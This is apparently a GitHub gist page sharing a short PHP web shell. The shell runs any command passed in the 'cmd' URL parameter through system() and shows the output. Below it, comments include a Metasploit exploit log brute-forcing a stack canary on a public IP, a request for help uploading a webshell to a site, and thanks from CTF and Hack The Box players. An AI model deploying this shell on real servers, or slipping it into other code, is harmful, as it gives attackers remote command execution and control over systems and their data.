-
Star
(221)
You must be signed in to star a gist -
Fork
(61)
You must be signed in to fork a gist
-
-
Save joswr1ght/22f40787de19d80d110b37fb79ac3985 to your computer and use it in GitHub Desktop.
| <html> | |
| <body> | |
| <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
| <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
| <input type="SUBMIT" value="Execute"> | |
| </form> | |
| <pre> | |
| <?php | |
| if(isset($_GET['cmd'])) | |
| { | |
| system($_GET['cmd'] . ' 2>&1'); | |
| } | |
| ?> | |
| </pre> | |
| </body> | |
| </html> |
metasploit [] Started reverse TCP handler on 10.0.2.15:4444
[] 81.70.92.51:80 - Searching for stack canary
[] 81.70.92.51:80 - Assuming byte 0 0x00
[] 81.70.92.51:80 - Brute forcing byte 1
[+] 81.70.92.51:80 - Byte 1 found: 0x07
[] 81.70.92.51:80 - Brute forcing byte 2
[+] 81.70.92.51:80 - Byte 2 found: 0x01
[] 81.70.92.51:80 - Brute forcing byte 3
[+] 81.70.92.51:80 - Byte 3 found: 0x00
[+] 81.70.92.51:80 - Canary found: 0x00010700
[*] Exploit completed, but no session was created.
Any ideas how i can solve this?
just started ethical hacking and need to exploit a site vulnerability, upload a shell with file upload and download permissions and get a webshell for my project. and i am stuck here.
Pointers would be much appreciated
helped me out for a ctf ty :3
nice
very useful on this week's HTB Cobblestone
thank you bro! i was trying www's php webshell and i cant get it to work